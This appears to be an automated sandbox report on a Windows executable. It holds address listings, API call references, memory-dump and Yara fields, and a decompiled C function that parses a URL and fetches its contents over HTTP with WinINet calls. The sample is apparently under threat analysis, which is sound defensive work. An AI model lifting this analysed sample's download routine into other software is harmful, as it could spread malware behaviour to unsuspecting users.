0x0041d137
0x0041d137
0x0041d12e
0x0041d12e
0x0041d12e
0x0041d13a
0x0041d13a
0x0041d13c
0x0041d13f
0x0041d144
0x0041d146
0x0041d14c
0x0041d158
0x0041d15e
0x0041d166
0x0041d172
0x0041d178
0x0041d17f
0x0041d198
0x0041d1ac
0x0041d1b0
0x0041d1b5
0x0041d1bd
0x0041d1c4
0x0041d1c6
0x0041d1c6
0x0041d1ca
0x0041d1d6
0x0041d1de
0x0041d1df
0x0041d1e4
0x0041d1e4
0x0041d1e9
0x0041d1f3
0x0041d1f9
0x0041d1ff
0x0041d209
0x0041d211
0x0041d212
0x0041d217
0x0041d217
0x0041d220
0x0041d22a
0x0041d230
0x0041d236
0x0041d23c
0x0041d244
0x0041d24a
0x0041d256
0x0041d258
0x0041d258
0x0041d260
0x0041d26c
0x0041d272
0x0041d279
0x0041d27f
0x0041d28b
0x0041d28d
0x0041d28d
0x0041d295
0x0041d2a1
0x0041d2c0
0x0041d2de
0x0041d2fc
0x0041d306
0x0041d30b
0x0041d31a
0x0041d31f
0x0041d31f
0x0041d146
0x0041d0df
0x0041d078
0x0041cb60
0x0041cb77
0x0041cb7d
0x0041cb81
0x0041cb86
0x0041cb8c
0x0041cb8f
0x0041cb91
0x0041cb97
0x0041cbbb
0x0041cbc5
0x0041cbca
0x0041cbcc
0x0041cbd6
0x0041cbd6
0x0041cbcc
0x00000000
0x0041cb97
0x0041cc1f

APIs

_memset.LIBCMT ref: 0041CA86

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 0041CA9D
lstrcat.KERNEL32(?,025C6750), ref: 0041CAB0

Part of subcall function 004205C0: GetFileAttributesA.KERNEL32(0040B658,?,0040B658,?), ref: 004205C7

Part of subcall function 00414D10: std::_Lockit::_Lockit.LIBCPMT ref: 00414D2C

Part of subcall function 00418BC0: std::_Lockit::_Lockit.LIBCPMT ref: 00418BED
Part of subcall function 00418BC0: std::_Lockit::_Lockit.LIBCPMT ref: 00418C10

std::_Lockit::_Lockit.LIBCPMT ref: 0041CBA1
_strlen.LIBCMT ref: 0041CC2D
_strlen.LIBCMT ref: 0041CCE7
_strlen.LIBCMT ref: 0041CD9B
_strlen.LIBCMT ref: 0041CE4F
_memmove.LIBCMT ref: 0041CF68
_strlen.LIBCMT ref: 0041CFB5
_memcmp.LIBCMT ref: 0041CFE9
_strlen.LIBCMT ref: 0041D01C
_memcmp.LIBCMT ref: 0041D050
_strlen.LIBCMT ref: 0041D083
_memcmp.LIBCMT ref: 0041D0B7
_strlen.LIBCMT ref: 0041D0EA
_memcmp.LIBCMT ref: 0041D11E
lstrcat.KERNEL32(?,00443C5C), ref: 0041D158
lstrcat.KERNEL32(?,025C6050), ref: 0041D166
lstrcat.KERNEL32(?,00443C5C), ref: 0041D172
lstrcat.KERNEL32(?,025C8880), ref: 0041D17F
lstrcat.KERNEL32(?,00000000), ref: 0041D1CA
lstrcat.KERNEL32(?,00443C5C), ref: 0041D236
lstrcat.KERNEL32(?,025C8690), ref: 0041D244
lstrcat.KERNEL32(?,00000000), ref: 0041D260
lstrcat.KERNEL32(?,00443C5C), ref: 0041D26C
lstrcat.KERNEL32(?,025C9270), ref: 0041D279
lstrcat.KERNEL32(?,00000000), ref: 0041D295
lstrcat.KERNEL32(?,004458A8), ref: 0041D2A1
_strlen.LIBCMT ref: 0041D2AC
_strlen.LIBCMT ref: 0041D2CA
_strlen.LIBCMT ref: 0041D2E8

Part of subcall function 00404BC0: std::_Xinvalid_argument.LIBCPMT ref: 00404C35

_strlen.LIBCMT ref: 0041D306
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041D42B

Strings

PMA, xrefs: 0041D421

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_strlen$std::_$LockitLockit::__memcmp$_memset$AttributesFileFolderIos_base_dtorPathXinvalid_argument_memmovestd::ios_base::_
String ID: PMA
API String ID: 1134639745-3622942700
Opcode ID: 2e4469b5fd537faa5634b1dd6cec58e752f2ebe3157e4145a2ef5cc53bfd6694
Instruction ID: 58ac762446b71b939a66813e49e42c455471d5897beba8dcbeae47bb80d6a6fd
Opcode Fuzzy Hash: 2e4469b5fd537faa5634b1dd6cec58e752f2ebe3157e4145a2ef5cc53bfd6694
Instruction Fuzzy Hash: AA52C7F1E002289BDB20DB24DD81BDE7779AB85704F0045EAE609A7281DB749EC5CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D960 Relevance: 60.4, APIs: 28, Strings: 6, Instructions: 863
networkfileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040D960(void* __eflags, char* _a4, char* _a8, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, char* _a40, intOrPtr _a60) {
				long _v8;
				char _v16;
				signed int _v20;
				void _v276;
				void _v2276;
				char _v2776;
				char _v3288;
				long _v3296;
				long _v3300;
				char _v3316;
				long _v3324;
				long _v3328;
				char _v3344;
				long _v3352;
				void* _v3356;
				char _v3372;
				long _v3380;
				long _v3384;
				char* _v3400;
				long _v3408;
				long _v3412;
				char* _v3428;
				long _v3436;
				long _v3440;
				char _v3456;
				long _v3464;
				long _v3468;
				char _v3484;
				long _v3492;
				long _v3496;
				char _v3512;
				long _v3520;
				long _v3524;
				char _v3540;
				long _v3544;
				void* _v3548;
				char _v3552;
				char* _v3556;
				void* _v3557;
				long _v3564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t353;
				signed int _t354;
				void* _t362;
				long _t365;
				long _t366;
				void* _t367;
				void* _t369;
				void* _t370;
				signed int _t371;
				char* _t375;
				void* _t382;
				char* _t386;
				void* _t388;
				void* _t390;
				char* _t392;
				void* _t394;
				void* _t397;
				char* _t399;
				void* _t401;
				void* _t403;
				char* _t405;
				char* _t408;
				char* _t410;
				char* _t412;
				char* _t414;
				void* _t415;
				char* _t416;
				short _t417;
				char* _t418;
				signed int _t419;
				intOrPtr _t421;
				char* _t435;
				void* _t436;
				char* _t438;
				void* _t439;
				int _t441;
				void* _t444;
				int _t457;
				signed int _t458;
				void* _t460;
				int _t463;
				char* _t465;
				void* _t466;
				void* _t491;
				long _t499;
				void* _t500;
				signed int _t501;
				signed int _t502;
				signed int _t503;
				signed int _t504;
				signed int _t505;
				signed int _t506;
				short _t507;
				void* _t509;
				signed int _t510;
				char* _t516;
				char* _t517;
				char* _t522;
				char* _t542;
				intOrPtr _t583;
				void* _t600;
				void* _t602;
				void* _t603;
				long _t606;
				void* _t607;
				void* _t608;
				intOrPtr _t610;
				void* _t611;
				long _t613;
				long _t617;
				void* _t619;
				void* _t620;
				intOrPtr _t621;
				signed int _t622;
				void* _t623;
				void* _t626;
				void* _t627;
				void* _t628;
				void* _t629;
				void* _t630;
				void* _t631;
				void* _t632;
				void* _t633;
				void* _t635;

				_t635 = __eflags;
				_push(0xffffffff);
				_push(E0043E405);
				_push( *[fs:0x0]);
				_t353 =  *0x451f00; // 0xc21d6f0a
				_t354 = _t353 ^ _t622;
				_v20 = _t354;
				_push(_t354);
				 *[fs:0x0] =  &_v16;
				_v3556 = _a4;
				_v3544 = 0;
				_v8 = 1;
				E0042A2F0( &_v3288, 0, 0x200);
				E0042A2F0( &_v2776, 0, 0x1f4);
				_v3492 = 0xf;
				_v3496 = 0;
				_v3512 = 0;
				E00404BC0( &_v3512, 0x443c1c, E0042BC70(0x443c1c));
				_v3380 = 0xf;
				_v3384 = 0;
				_v3400 = 0;
				_v3408 = 0xf;
				_v3412 = 0;
				_v3428 = 0;
				_v3352 = 0xf;
				_v3356 = 0;
				_v3372 = 0;
				_v3464 = 0xf;
				_v3468 = 0;
				_v3484 = 0;
				_v3436 = 0xf;
				_v3440 = 0;
				_v3456 = 0;
				_v3520 = 0xf;
				_v3524 = 0;
				_v3540 = 0;
				_v8 = 8;
				_v3548 = 0;
				_t362 = E0040C3A0( &_v3344, _t635,  &_v3344,  &_a8);
				_t626 = _t623 - 0xddc + 0x24;
				_v8 = 9;
				E00404D00( &_v3372, _t362);
				_v8 = 8;
				if(_v3324 >= 0x10) {
					_push(_v3344);
					E0042A289();
					_t626 = _t626 + 4;
				}
				_t499 = E0042BC70("https://");
				_t365 = _v3356;
				_t606 = 8;
				_t627 = _t626 + 4;
				if(_t365 < 8) {
					_t606 = _t365;
				}
				_t366 = _t606;
				if(_t606 >= _t499) {
					_t366 = _t499;
				}
				_t516 = _v3372;
				if(_v3352 < 0x10) {
					_t516 =  &_v3372;
				}
				_t367 = E0042A379(_t516, "https://", _t366);
				_t628 = _t627 + 0xc;
				if(_t367 != 0 || _t606 < _t499 || (0 | _t606 != _t499) != 0) {
					_t500 = E0042BC70("http://");
					_t369 = _v3356;
					_t607 = 7;
					_t629 = _t628 + 4;
					__eflags = _t369 - 7;
					if(_t369 < 7) {
						_t607 = _t369;
					}
					_t370 = _t607;
					__eflags = _t607 - _t500;
					if(_t607 >= _t500) {
						_t370 = _t500;
					}
					__eflags = _v3352 - 0x10;
					_t517 = _v3372;
					if(_v3352 < 0x10) {
						_t517 =  &_v3372;
					}
					_t371 = E0042A379(_t517, "http://", _t370);
					_t628 = _t629 + 0xc;
					__eflags = _t371;
					if(_t371 == 0) {
						__eflags = _t607 - _t500;
						if(_t607 >= _t500) {
							_t607 - _t500 = _t607 == _t500;
							if(_t607 == _t500) {
								_v3548 = 7;
							}
						}
					}
				} else {
					_v3548 = 8;
				}
				_v3552 = 0x2f;
				_t608 = E0040A2A0( &_v3372,  &_v3552, _v3548 + 1, 1);
				if(_t608 != 0xffffffff) {
					_t375 = E0040D070( &_v3372,  &_v3344, _t608, 0xffffffff);
					_v8 = 0xb;
					_t501 = 2;
				} else {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					_t491 = E0042BC70(0x443c1c);
					_t628 = _t628 + 4;
					E00404BC0( &_v3316, 0x443c1c, _t491);
					_t375 =  &_v3316;
					_v8 = 0xa;
					_t501 = 1;
				}
				_v3544 = _t501;
				E00404D00( &_v3400, _t375);
				if((_t501 & 0x00000002) != 0) {
					_t501 = _t501 & 0xfffffffd;
					_v3544 = _t501;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t628 = _t628 + 4;
					}
					_v3324 = 0xf;
					_v3328 = 0;
					_v3344 = 0;
				}
				_v8 = 8;
				if((_t501 & 0x00000001) != 0) {
					_t501 = _t501 & 0xfffffffe;
					_v3544 = _t501;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t628 = _t628 + 4;
					}
				}
				_t377 = _v3372;
				_t583 = _v3352;
				_t522 = _v3372;
				if(_t608 == 0xffffffff) {
					__eflags = _t583 - 0x10;
					if(_t583 < 0x10) {
						_t522 =  &_v3372;
					}
					_t523 = _t522 + _v3356;
					__eflags = _t522 + _v3356;
				} else {
					if(_t583 < 0x10) {
						_t522 =  &_v3372;
					}
					_t523 = _t522 + _t608;
				}
				if(_t583 < 0x10) {
					_t377 =  &_v3372;
				}
				_push(_v3564);
				_v3296 = 0xf;
				_v3300 = 0;
				_v3316 = 0;
				E0040A680( &_v3316, _t377 + _v3548, _t523);
				_v8 = 0xc;
				E00404D00( &_v3428,  &_v3316);
				_v8 = 8;
				if(_v3296 >= 0x10) {
					_push(_v3316);
					E0042A289();
					_t628 = _t628 + 4;
				}
				_t382 = E0042BC70("#");
				_t630 = _t628 + 4;
				if(E0040A2A0( &_v3400, "#", 0, _t382) == 0xffffffff) {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					E00404AD0( &_v3316,  &_v3400, 0, 0xffffffff);
					_t386 =  &_v3316;
					_v8 = 0xe;
					_t502 = _t501 | 0x00000008;
					__eflags = _t502;
				} else {
					_t386 = E0040D070( &_v3400,  &_v3344, 0, _t383);
					_v8 = 0xd;
					_t502 = _t501 | 0x00000004;
				}
				_v3544 = _t502;
				E00404D00( &_v3400, _t386);
				if((_t502 & 0x00000008) != 0) {
					_t502 = _t502 & 0xfffffff7;
					_v3544 = _t502;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t630 = _t630 + 4;
					}
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
				}
				_v8 = 8;
				if((_t502 & 0x00000004) != 0) {
					_t502 = _t502 & 0xfffffffb;
					_v3544 = _t502;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t630 = _t630 + 4;
					}
				}
				_t388 = E0042BC70(":");
				_t631 = _t630 + 4;
				_t610 = E0040A2A0( &_v3428, ":", 0, _t388);
				if(_t610 == 0xffffffff) {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					_t390 = E0042BC70(0x443c1c);
					_t631 = _t631 + 4;
					E00404BC0( &_v3316, 0x443c1c, _t390);
					_t392 =  &_v3316;
					_v8 = 0x10;
					_t503 = _t502 | 0x00000020;
					__eflags = _t503;
				} else {
					_t129 = _t610 + 1; // 0x1
					_t392 = E0040D070( &_v3428,  &_v3344, _t129, 0xffffffff);
					_v8 = 0xf;
					_t503 = _t502 | 0x00000010;
				}
				_v3544 = _t503;
				E00404D00( &_v3456, _t392);
				if((_t503 & 0x00000020) != 0) {
					_t503 = _t503 & 0xffffffdf;
					_v3544 = _t503;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t631 = _t631 + 4;
					}
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
				}
				_v8 = 8;
				if((_t503 & 0x00000010) != 0) {
					_t503 = _t503 & 0xffffffef;
					_v3544 = _t503;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t631 = _t631 + 4;
					}
				}
				if(_t610 == 0xffffffff) {
					_t610 = _v3412;
				}
				_t394 = E0040D070( &_v3428,  &_v3344, 0, _t610);
				_v8 = 0x11;
				E00404D00( &_v3428, _t394);
				_v8 = 8;
				if(_v3324 >= 0x10) {
					_push(_v3344);
					E0042A289();
					_t631 = _t631 + 4;
				}
				_t396 = _v3548;
				if(_v3548 <= 0) {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					_t397 = E0042BC70(0x443c1c);
					_t631 = _t631 + 4;
					E00404BC0( &_v3316, 0x443c1c, _t397);
					_t399 =  &_v3316;
					_v8 = 0x13;
					_t504 = _t503 | 0x00000080;
					__eflags = _t504;
				} else {
					_t399 = E0040D070( &_v3372,  &_v3344, 0, _t396 + 0xfffffffd);
					_v8 = 0x12;
					_t504 = _t503 | 0x00000040;
				}
				_v3544 = _t504;
				E00404D00( &_v3484, _t399);
				if(_t504 < 0) {
					_t504 = _t504 & 0xffffff7f;
					_v3544 = _t504;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t631 = _t631 + 4;
					}
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
				}
				_v8 = 8;
				if((_t504 & 0x00000040) != 0) {
					_t504 = _t504 & 0xffffffbf;
					_v3544 = _t504;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t631 = _t631 + 4;
					}
				}
				_t401 = E0042BC70("?");
				_t632 = _t631 + 4;
				_t611 = E0040A2A0( &_v3400, "?", 0, _t401);
				if(_t611 == 0xffffffff) {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					_t403 = E0042BC70(0x443c1c);
					_t632 = _t632 + 4;
					E00404BC0( &_v3316, 0x443c1c, _t403);
					_t405 =  &_v3316;
					_v8 = 0x15;
					_t505 = _t504 | 0x00000200;
					__eflags = _t505;
				} else {
					_t188 = _t611 + 1; // 0x1
					_t405 = E0040D070( &_v3400,  &_v3344, _t188, 0xffffffff);
					_v8 = 0x14;
					_t505 = _t504 | 0x00000100;
				}
				_v3544 = _t505;
				E00404D00( &_v3540, _t405);
				if((_t505 & 0x00000200) != 0) {
					_t505 = _t505 & 0xfffffdff;
					_v3544 = _t505;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t632 = _t632 + 4;
					}
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
				}
				_v8 = 8;
				if((_t505 & 0x00000100) != 0) {
					_t505 = _t505 & 0xfffffeff;
					_v3544 = _t505;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t632 = _t632 + 4;
					}
				}
				if(_t611 == 0xffffffff) {
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
					E00404AD0( &_v3316,  &_v3400, 0, 0xffffffff);
					_t408 =  &_v3316;
					_v8 = 0x17;
					_t506 = _t505 | 0x00000800;
					__eflags = _t506;
				} else {
					_t408 = E0040D070( &_v3400,  &_v3344, 0, _t611);
					_v8 = 0x16;
					_t506 = _t505 | 0x00000400;
				}
				_v3544 = _t506;
				E00404D00( &_v3400, _t408);
				if((_t506 & 0x00000800) != 0) {
					_t506 = _t506 & 0xfffff7ff;
					if(_v3296 >= 0x10) {
						_push(_v3316);
						E0042A289();
						_t632 = _t632 + 4;
					}
					_v3296 = 0xf;
					_v3300 = 0;
					_v3316 = 0;
				}
				_v8 = 8;
				if((_t506 & 0x00000400) != 0 && _v3324 >= 0x10) {
					_push(_v3344);
					E0042A289();
					_t632 = _t632 + 4;
				}
				_t410 = _v3428;
				if(_v3408 < 0x10) {
					_t410 =  &_v3428;
				}
				DeleteUrlCacheEntry(_t410); // executed
				_t412 = _a8;
				if(_a28 < 0x10) {
					_t412 =  &_a8;
				}
				DeleteUrlCacheEntry(_t412);
				_t682 = _a36;
				if(_a36 == 0) {
					_t414 = _a40;
					__eflags = _a60 - 0x10;
					if(_a60 < 0x10) {
						_t414 =  &_a40;
					}
					_t415 = InternetOpenA(_t414, 0, 0, 0, 0); // executed
					_t600 = _t415;
					_v3548 = _t415;
					_t613 = 0x10;
				} else {
					_t465 = E00420220(0, _t682,  &_v3344);
					_v8 = 0x18;
					if(_t465[0x14] >= 0x10) {
						_t465 =  *_t465;
					}
					_t466 = InternetOpenA(_t465, 0, 0, 0, 0);
					_t613 = 0x10;
					_t600 = _t466;
					_v3548 = _t600;
					_v8 = 8;
					if(_v3324 >= 0x10) {
						_push(_v3344);
						E0042A289();
						_t632 = _t632 + 4;
					}
					_v3324 = 0xf;
					_v3328 = 0;
					_v3344 = 0;
				}
				_t416 = _v3456;
				if(_v3436 < _t613) {
					_t416 =  &_v3456;
				}
				_push(_t416);
				_t417 = E0042D020();
				_t633 = _t632 + 4;
				_t507 = _t417;
				_t418 = _v3484;
				if(_v3464 < _t613) {
					_t418 =  &_v3484;
				}
				_t419 =  *0x464890(_t418, "https");
				asm("sbb esi, esi");
				_t617 = ( ~_t419 & 0xff800000) + 0x4800000;
				if(_t600 == 0) {
					L134:
					_t542 = _v3556;
					_t586 =  &_v3512;
					 *((intOrPtr*)(_t542 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t542 + 0x10)) = 0;
					 *_t542 = 0;
					E00404D00(_t542,  &_v3512);
					__eflags = _v3520 - 0x10;
					if(_v3520 >= 0x10) {
						_push(_v3540);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3520 = 0xf;
					_v3524 = 0;
					_v3540 = 0;
					__eflags = _v3436 - 0x10;
					if(_v3436 >= 0x10) {
						_push(_v3456);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3436 = 0xf;
					_v3440 = 0;
					_v3456 = 0;
					__eflags = _v3464 - 0x10;
					if(_v3464 >= 0x10) {
						_t586 = _v3484;
						_push(_v3484);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3464 = 0xf;
					_v3468 = 0;
					_v3484 = 0;
					__eflags = _v3352 - 0x10;
					if(_v3352 >= 0x10) {
						_push(_v3372);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3352 = 0xf;
					_v3356 = 0;
					_v3372 = 0;
					__eflags = _v3408 - 0x10;
					if(_v3408 >= 0x10) {
						_push(_v3428);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3408 = 0xf;
					_v3412 = 0;
					_v3428 = 0;
					__eflags = _v3380 - 0x10;
					if(_v3380 >= 0x10) {
						_t586 = _v3400;
						_push(_v3400);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3380 = 0xf;
					_v3384 = 0;
					_v3400 = 0;
					__eflags = _v3492 - 0x10;
					if(_v3492 >= 0x10) {
						_push(_v3512);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_v3492 = 0xf;
					_v3496 = 0;
					_v3512 = 0;
					__eflags = _a28 - 0x10;
					if(_a28 >= 0x10) {
						_push(_a8);
						E0042A289();
						_t633 = _t633 + 4;
					}
					_a28 = 0xf;
					_a24 = 0;
					_a8 = 0;
					__eflags = _a60 - 0x10;
					if(_a60 >= 0x10) {
						_t586 = _a40;
						_push(_a40);
						E0042A289();
					}
					_t421 = _v3556;
					goto L153;
				} else {
					_t435 = _v3428;
					if(_v3408 < 0x10) {
						_t435 =  &_v3428;
					}
					_t436 = InternetConnectA(_v3548, _t435, _t507, 0, 0, 3, _t617, 0); // executed
					_t603 = _t436;
					if(_t603 == 0) {
						L133:
						InternetCloseHandle(_v3548);
						goto L134;
					} else {
						_t438 = _v3400;
						if(_v3380 < 0x10) {
							_t438 =  &_v3400;
						}
						_t439 = HttpOpenRequestA(_t603, "GET", _t438, 0, 0, 0, _t617, 0); // executed
						_t620 = _t439;
						if(_t620 == 0) {
							L132:
							InternetCloseHandle(_t603);
							goto L133;
						} else {
							_t441 = HttpSendRequestA(_t620, 0, 0, 0, 0); // executed
							_t586 =  &_v3564;
							_t510 = _t441;
							_v3564 = 0x100;
							if(HttpQueryInfoA(_t620, 0x13,  &_v276,  &_v3564, 0) != 0) {
								_push( &_v276);
								_t444 = E0042D020();
								_t633 = _t633 + 4;
								__eflags = _t444 - 0xc8;
								if(_t444 != 0xc8) {
									goto L122;
								}
								__eflags = _t510;
								if(_t510 == 0) {
									L131:
									InternetCloseHandle(_t620); // executed
									goto L132;
								}
								_t457 = InternetReadFile(_t620,  &_v2276, 0x7cf,  &_v3544); // executed
								__eflags = _t457;
								if(_t457 == 0) {
									goto L131;
								}
								while(1) {
									_t458 = _v3544;
									__eflags = _t458;
									if(__eflags == 0) {
										goto L131;
									}
									 *((char*)(_t622 + _t458 - 0x8e0)) = 0;
									_t460 = E0040D100(__eflags,  &_v3316,  &_v3512,  &_v2276); // executed
									_t633 = _t633 + 0xc;
									_v8 = 0x19;
									E00404D00( &_v3512, _t460);
									__eflags = _v3296 - 0x10;
									_v8 = 8;
									if(_v3296 >= 0x10) {
										_push(_v3316);
										E0042A289();
										_t633 = _t633 + 4;
									}
									_t463 = InternetReadFile(_t620,  &_v2276, 0x7cf,  &_v3544); // executed
									__eflags = _t463;
									if(_t463 != 0) {
										continue;
									} else {
										goto L131;
									}
								}
								goto L131;
							}
							L122:
							_t621 = _v3556;
							E00404CC0(_t621, "ERROR");
							E0040A450( &_v3540);
							E0040A450( &_v3456);
							E0040A450( &_v3484);
							E0040A450( &_v3372);
							E0040A450( &_v3428);
							E0040A450( &_v3400);
							E0040A450( &_v3512);
							E0040A450( &_a8);
							E0040A450( &_a40);
							_t421 = _t621;
							L153:
							 *[fs:0x0] = _v16;
							_pop(_t602);
							_pop(_t619);
							_pop(_t509);
							return E0042A36A(_t421, _t509, _v20 ^ _t622, _t586, _t602, _t619);
						}
					}
				}
			}

0x0040d960
0x0040d963
0x0040d965
0x0040d970
0x0040d977
0x0040d97c
0x0040d97e
0x0040d984
0x0040d988
0x0040d993
0x0040d999
0x0040d9ac
0x0040d9b3
0x0040d9c5
0x0040d9d4
0x0040d9da
0x0040d9e0
0x0040d9fb
0x0040da00
0x0040da06
0x0040da0c
0x0040da13
0x0040da19
0x0040da1f
0x0040da26
0x0040da2c
0x0040da32
0x0040da39
0x0040da3f
0x0040da45
0x0040da4c
0x0040da52
0x0040da58
0x0040da5f
0x0040da65
0x0040da6b
0x0040da7d
0x0040da81
0x0040da87
0x0040da8c
0x0040da96
0x0040da9a
0x0040daa6
0x0040daaa
0x0040dab2
0x0040dab3
0x0040dab8
0x0040dab8
0x0040dac5
0x0040dac7
0x0040dacd
0x0040dad2
0x0040dad7
0x0040dad9
0x0040dad9
0x0040dadb
0x0040dadf
0x0040dae1
0x0040dae1
0x0040daea
0x0040daf0
0x0040daf2
0x0040daf2
0x0040daff
0x0040db04
0x0040db09
0x0040db30
0x0040db32
0x0040db38
0x0040db3d
0x0040db40
0x0040db42
0x0040db44
0x0040db44
0x0040db46
0x0040db48
0x0040db4a
0x0040db4c
0x0040db4c
0x0040db4e
0x0040db55
0x0040db5b
0x0040db5d
0x0040db5d
0x0040db6a
0x0040db6f
0x0040db72
0x0040db74
0x0040db76
0x0040db78
0x0040db81
0x0040db83
0x0040db85
0x0040db85
0x0040db83
0x0040db78
0x0040db1a
0x0040db1a
0x0040db1a
0x0040dba6
0x0040dbb2
0x0040dbb7
0x0040dc0f
0x0040dc14
0x0040dc1b
0x0040dbb9
0x0040dbbe
0x0040dbc8
0x0040dbce
0x0040dbd5
0x0040dbda
0x0040dbe9
0x0040dbee
0x0040dbf4
0x0040dbf8
0x0040dbf8
0x0040dc27
0x0040dc2d
0x0040dc35
0x0040dc37
0x0040dc41
0x0040dc47
0x0040dc4f
0x0040dc50
0x0040dc55
0x0040dc55
0x0040dc58
0x0040dc62
0x0040dc68
0x0040dc68
0x0040dc6f
0x0040dc79
0x0040dc7b
0x0040dc85
0x0040dc8b
0x0040dc93
0x0040dc94
0x0040dc99
0x0040dc99
0x0040dc8b
0x0040dc9c
0x0040dca2
0x0040dca8
0x0040dcad
0x0040dcbe
0x0040dcc1
0x0040dcc3
0x0040dcc3
0x0040dcc9
0x0040dcc9
0x0040dcaf
0x0040dcb2
0x0040dcb4
0x0040dcb4
0x0040dcba
0x0040dcba
0x0040dcd2
0x0040dcd4
0x0040dcd4
0x0040dce6
0x0040dcf4
0x0040dcfa
0x0040dd00
0x0040dd07
0x0040dd19
0x0040dd1d
0x0040dd29
0x0040dd2d
0x0040dd35
0x0040dd36
0x0040dd3b
0x0040dd3b
0x0040dd43
0x0040dd48
0x0040dd60
0x0040dd8f
0x0040dd95
0x0040dd9b
0x0040dda2
0x0040dda7
0x0040ddad
0x0040ddb4
0x0040ddb4
0x0040dd62
0x0040dd71
0x0040dd76
0x0040dd7a
0x0040dd7a
0x0040ddbe
0x0040ddc4
0x0040ddcc
0x0040ddce
0x0040ddd8
0x0040ddde
0x0040dde6
0x0040dde7
0x0040ddec
0x0040ddec
0x0040ddef
0x0040ddf5
0x0040ddfb
0x0040ddfb
0x0040de02
0x0040de0c
0x0040de0e
0x0040de18
0x0040de1e
0x0040de26
0x0040de27
0x0040de2c
0x0040de2c
0x0040de1e
0x0040de34
0x0040de39
0x0040de4e
0x0040de53
0x0040de7b
0x0040de85
0x0040de8b
0x0040de92
0x0040de97
0x0040dea6
0x0040deab
0x0040deb1
0x0040deb8
0x0040deb8
0x0040de55
0x0040de57
0x0040de68
0x0040de6d
0x0040de71
0x0040de71
0x0040dec2
0x0040dec8
0x0040ded0
0x0040ded2
0x0040dedc
0x0040dee2
0x0040deea
0x0040deeb
0x0040def0
0x0040def0
0x0040def3
0x0040defd
0x0040df03
0x0040df03
0x0040df0a
0x0040df14
0x0040df16
0x0040df20
0x0040df26
0x0040df2e
0x0040df2f
0x0040df34
0x0040df34
0x0040df26
0x0040df3a
0x0040df3c
0x0040df3c
0x0040df51
0x0040df5d
0x0040df61
0x0040df6d
0x0040df71
0x0040df79
0x0040df7a
0x0040df7f
0x0040df7f
0x0040df82
0x0040df8a
0x0040dfb1
0x0040dfbb
0x0040dfc1
0x0040dfc8
0x0040dfcd
0x0040dfdc
0x0040dfe1
0x0040dfe7
0x0040dfee
0x0040dfee
0x0040df8c
0x0040df9e
0x0040dfa3
0x0040dfa7
0x0040dfa7
0x0040dffb
0x0040e001
0x0040e008
0x0040e00a
0x0040e017
0x0040e01d
0x0040e025
0x0040e026
0x0040e02b
0x0040e02b
0x0040e02e
0x0040e038
0x0040e03e
0x0040e03e
0x0040e045
0x0040e04f
0x0040e051
0x0040e05b
0x0040e061
0x0040e069
0x0040e06a
0x0040e06f
0x0040e06f
0x0040e061
0x0040e077
0x0040e07c
0x0040e091
0x0040e096
0x0040e0c1
0x0040e0cb
0x0040e0d1
0x0040e0d8
0x0040e0dd
0x0040e0ec
0x0040e0f1
0x0040e0f7
0x0040e0fe
0x0040e0fe
0x0040e098
0x0040e09a
0x0040e0ab
0x0040e0b0
0x0040e0b4
0x0040e0b4
0x0040e10b
0x0040e111
0x0040e11c
0x0040e11e
0x0040e12b
0x0040e131
0x0040e139
0x0040e13a
0x0040e13f
0x0040e13f
0x0040e142
0x0040e14c
0x0040e152
0x0040e152
0x0040e159
0x0040e166
0x0040e168
0x0040e175
0x0040e17b
0x0040e183
0x0040e184
0x0040e189
0x0040e189
0x0040e17b
0x0040e18f
0x0040e1c1
0x0040e1cb
0x0040e1d1
0x0040e1d8
0x0040e1dd
0x0040e1e3
0x0040e1ea
0x0040e1ea
0x0040e191
0x0040e1a0
0x0040e1a5
0x0040e1a9
0x0040e1a9
0x0040e1f7
0x0040e1fd
0x0040e20d
0x0040e20f
0x0040e21b
0x0040e223
0x0040e224
0x0040e229
0x0040e229
0x0040e22c
0x0040e236
0x0040e23c
